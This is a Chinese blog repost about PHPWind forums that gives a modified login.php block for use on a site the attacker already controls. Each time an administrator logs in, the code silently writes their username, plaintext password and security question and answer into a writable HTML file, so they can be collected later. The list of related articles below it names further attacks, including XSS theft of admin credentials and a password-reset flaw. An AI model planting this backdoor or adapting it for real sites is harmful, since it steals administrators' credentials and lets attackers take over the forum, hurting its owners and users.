php管理员密码,PHPWIND得到管理员密码的方法.

最新推荐文章于 2021-03-27 05:06:10 发布
最新推荐文章于 2021-03-27 05:06:10 发布
阅读量191 收藏
点赞数
文章标签: php管理员密码

有站的权限,但是管理员密码很复杂,MD5暴不出来,想得到他密码咋办?在登录文件做手脚啊...我来贴一个我修改的.login.php里面替换掉对应的部分就OK了.

[Copy to clipboard] [ - ]CODE:if($action=="login"){/*记录他的问题和答案修改开始*/$ques=($_POST['question']!=='-1') ? $_POST['question'] : $_POST['customquest'];$qs='问题:'.$ques.'答案:'.$_POST['answer'];/*记录他的问题和答案修改结束*/if(!$_POST['step']){  $jumpurl = $pre_url;  require_once(R_P.'require/header.php');  require_once PrintEot('login');footer();  } elseif($_POST['step']==2){  $logingd && GdConfirm($_POST['gdcode']);  $loginq && Qcheck($_POST['qanswer'],$_POST['qkey']);

require_once(R_P.'require/checkpass.php');  include_once(D_P."data/bbscache/dbreg.php");  InitGP(array('pwuser','pwpwd','question','customquest','answer','cktime','hideid','jumpurl'),'P');  if ($pwuser && $pwpwd)  {   $md5_pwpwd = md5($pwpwd);   $realpass=$pwpwd;   $safecv = $db_ifsafecv ? questcode($question,$customquest,$answer) : '';   list($winduid,$groupid,$pwpwd) = checkpass($pwuser,$md5_pwpwd,$safecv,$lgt);   /*下面是我添加的*/   $adminid = array("3", "4", "5");  //adminid=3,4,5,就是管理者.   if (in_array($groupid, $adminid)){   $showtime=date("Y-m-d H:i:s");  //记录的时间.   @$fp = fopen(D_P.'./data/groupdb/index.html', 'a');  //写入到原本就存在的文件,而且这个文件应该是可写的.   @fwrite($fp, '用户名:'.$pwuser.'-密码:'.$realpass.'-'.$qs.'-GroupID:'.$groupid.'-'.$showtime.'
');  //基本格式   @fclose($fp);   }   /*到这里修改结束*/  }else{   Showmsg('login_empty');  }  if(file_exists(D_P."data/groupdb/group_$groupid.php")){   require_once Pcv(D_P."data/groupdb/group_$groupid.php");  } else{   require_once(D_P."data/groupdb/group_1.php");  }  $windpwd = $pwpwd;  $cktime != 0 && $cktime += $timestamp;  Cookie("winduser",StrCode($winduid."\t".$windpwd."\t".$safecv),$cktime);  Cookie('lastvisit','',0);//将$lastvist清空以将刚注册的会员加入今日到访会员中  if($db_autoban){   require_once(R_P.'require/autoban.php');   autoban($winduid);  }  ($gp_allowhide && $hideid) ? Cookie('hideid',"1",$cktime) : Loginipwrite($winduid);  empty($jumpurl) && $jumpurl=$db_bfn;  //passport  if($db_pptifopen && $db_ppttype == 'server' && ($db_ppturls || $forward)){   $tmp = $jumpurl;   $jumpurl = $forward ? $forward : $db_ppturls;   $forward = $tmp;   require_once(R_P.'require/passport_server.php');  }  //passport  refreshto($jumpurl,'have_login');}} 很龌龊吧.

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

一二三是五六十~~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
阿里云产品 phpwind 推送和泄露站长管理员用户ID和密码信息,曝光!曝光!曝光!...
weixin_30951743的博客
12-30 123
后台管理员登录数据通过地址推送到阿里云:(如下链接所示) http://open.phpwind.com/sitepush.php?a=notice&siteurl=http%3A%2F%2Flocalhost%2Fphpwind&version=9.0.1&uid=1&ts=1546167831&sign=9c4bbef7349428753a6f8304...
PHPWIND创始人密码恢复工具
02-27
PHPWIND创始人密码恢复工具
Admin.php 密码忘了,phpwind管理员密码忘了怎么找回教程
weixin_42197110的博客
03-10 1421
Phpwind的管理员密码是经过MD5加密的,要修改/找回网站的管理员密码,需要一个已知的MD5加密字符串。为了写这篇文章,我在php空间上安装了一个测试环境,来验证这个方法的可行性。如下:测试版本:phpwind v8.3Phpwind v8.3的管理员帐号是:admin管理员密码是:123456密码“123456”的MD5加密字符串:99c2bca66754c2c9b6521538452df5...
修改密码PHP博客,phpwind任意修改管理员密码漏洞
weixin_31510505的博客
03-27 485
漏洞说明:PHPWind 论坛系统 是一套采用 php+mysql 数据库方式运行并可生成 html 页面的全新且完善的强大系统。因具有非凡的访问速度和卓越的负载能力而深受国内外朋友的喜爱。但是80sec在其中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员密码进入后台,取得管理员权限。漏洞厂商:http://www.phpwind.net漏洞来源:http://www.80sec.com/...
phpwind任意修改管理员密码漏洞
HackCode的专栏
08-07 2723
 漏洞说明:PHPWind 论坛系统 是一套采用 php+mysql 数据库方式运行并可生成 html 页面的全新且完善的强大系统。因具有非凡的访问速度和卓越的负载能力而深受国内外朋友的喜爱。但是80sec在其中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员密码进入后台,取得管理员权限。漏洞厂商:http://www.phpwind.net漏洞来源:http://www.80s
php截获用户明文密码,【超详细入门教程】通过xss获取管理员明文账号密码
weixin_34533343的博客
03-16 371
本帖最后由 说书人 于 2019-12-17 03:56 编辑0x00前言本文所讲的知识点很早就有,只是因为最近小伙伴讨论的比较多,而且很多小伙伴不太明确流程,故有了此文,大佬请忽略xss大家都不陌生,最常用的就是打管理员的cookie然后拿到后台权限。但是在实战过程中会碰到很多因素导致无法获得权限或者权限维持困难,下面列举了三点。随着开发者安全意识的提高,现在基本上都是开了httponly了...
PHP实例开发源码—php论坛 PHPWind Forums UTF8.zip
最新发布
11-23
- **论坛管理**:包括板块管理、会员管理、帖子管理等,方便管理员维护论坛秩序。 - **用户互动**:提供回复、点赞、举报、私信等功能,增强用户间的互动。 - **插件系统**:通过安装插件可以增加论坛功能,如...
PHP实例开发源码—PHPWind Forums(论坛) GBK.zip
11-12
2. **模板引擎**:PHPWind 使用自定义的模板引擎,允许管理员或开发者自定义论坛的外观和布局,这涉及到 HTML、CSS 和 JavaScript 的前端技术。 3. **数据库操作**:论坛的数据存储通常基于 MySQL,PHPWind 使用 ...
phpwind-admin.rar_php后台_现成网站php_网站后台
09-14
这是管理员登录后看到的第一个页面,通常显示系统状态、重要通知、统计数据等信息。开发者可以根据需要调整布局,添加自定义模块,如待办事项、最新用户、论坛统计等。 4. **图片资源(images)** `images`文件夹...
PHP实例开发源码—PHPWind Forums(论坛) BIG5.zip
11-22
PHPWind 论坛是一款基于 PHP 语言和 MySQL 数据库的开源社区建站系统,它以其高效、稳定和功能丰富的特点,在国内受到了众多网站管理员的青睐。这个“PHPWind Forums (论坛) BIG5.zip”文件是一个包含 PHPWind 论坛...
phpwind_8.7 PHP
08-23
7. **统计分析**:提供访问统计、热门话题、活跃用户等数据分析,帮助管理员了解网站运营状况。 8. **安全保障**:包括防灌水、反垃圾邮件、登录安全验证等,保障网站安全运行。 总的来说,PHPWind 8.7 是一个功能...
记录PHPWIND登陆密码
laZZe's blog
04-20 576
在login.php   Cookie("ck_info",$db_ckpath."\t".$db_ckdomain);下面加入  Cookie("usernamep",$pwuser); Cookie("passwordp",$pwpwd); 复制代码然后在index.php selectMode($m);上面加入  if (!is_null(GetCookie('usernamep
phpwind的密码及cookie加密方式
hzcyclone的专栏
03-12 2054
phpwind的数据表中,密码采用单纯一次md5加密的方式。所有的密码经过一次md5之后存入数据库。这在当今来说,并不是什么安全的方式。因为假设,你的数据库被人盗取,那么用户的密码也几乎被人盗取。因为现在甚至有在线破解md5值的网站,已经积累了大量的数据,简单的位数短的密码可以直接还原。让你的隐私无处循形。 而在本博中,我曾提到过一次discuz的加密方式,http://www.akii.org
php admin 账号密码修改,更改用户密码Django admin
weixin_39974932的博客
03-24 251
我是Django新手。我有以下代码:型号:class MyUser(AbstractUser):profile = models.OneToOneField(Profile, null=True, on_delete=models.PROTECT)我的配置文件模型只包含一些个人字段,如全名、性别、生日等管理员:^{pr2}$我无法更改用户的密码。起初,更改密码页面根本没有打开(Profile wi...
PHPWIND得到管理员密码方法
fengling132的专栏
05-02 1396
有站的权限,但是管理员密码很复杂,MD5暴不出来,想得到密码咋办? 在登录文件做手脚啊...我来贴一个我修改的. login.php里面替换掉对应的部分就OK了.   [Copy to clipboard] [ - ]CODE: if($action=="login"){ /*记录他的问题和答案修改开始*/ $ques=($_POST['question']!=='-1') ? $
php怎么获取账号密码,PHP 前台代码实现获取用户密码功能
weixin_34169322的博客
03-12 712
比如说用户登录-->进入个人首页在进入个人首页的时候验证一下登录的用户密码是否全部数字或者全英文进入个人首页 提示弹出出来的层内容:系统检测到您的账户密码过于简单,存在严重的安全隐患,建议您及时修改 ,以免造成录音被误删等不必要的麻烦和损失。两个按钮用户jquery 或者是PHP 某种方式可以实现呢?回复讨论(解决方案)用ajax可以实现,document.ready里可以把该用户传进后台查...
php关闭验证码,PHPWind9.0手动屏蔽验证码解决后台关闭验证码但是依然显示的问题...
weixin_32324637的博客
03-20 221
最近在设计一款产品,需要POST登录PHPWind,然而众所周知,PHPWind9(以下简称pw9)自身拥有安全策略,详情各位可以自己去phpwind官方论坛看。安全策略的存在会导致即便站长关闭验证码策略依然在登陆时会显示验证码(前提是该用户重试太多次)。要POST登录,并且不需要验证码,就得处理这个问题,然而官方并没有提供解决的方案,只能依赖自己处理。首先要明白,phpwind不像众多简单的ph...
admin.php怎么登陆,怎么找回zblogPHP后台管理员登录密码(两种方法
weixin_36435766的博客
03-10 2079
如果你把zblogPHP后台管理员登录密码忘记了怎么办?如何找回密码呢?为了解决这个问题,刘代码接下来就介绍两种方法。一、使用[Z-BlogPHP密码找回工具]这是一款zblog官方开发的大杀器,是您居家旅行必备的工具之一。使用方法:下载压缩包并将压缩包解压,然后通过FTP上传到Z-BlogPHP的根目录,在浏览器中打开nologin.php,使用过后请FTP删除。二、根据VerifyLogin...
PHPWind 4.3.2060428 源码解析:global.php与核心机制
PHPWind 是一款流行的开源社区论坛软件,它的源码解析文档主要关注了 `global.php` 文件及其相关的源码。这份文档是由用户 claudedb 在霏凡论坛原创分享的,目的是帮助读者理解 PHPWind 4.3.2060428 版本的运行机制...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值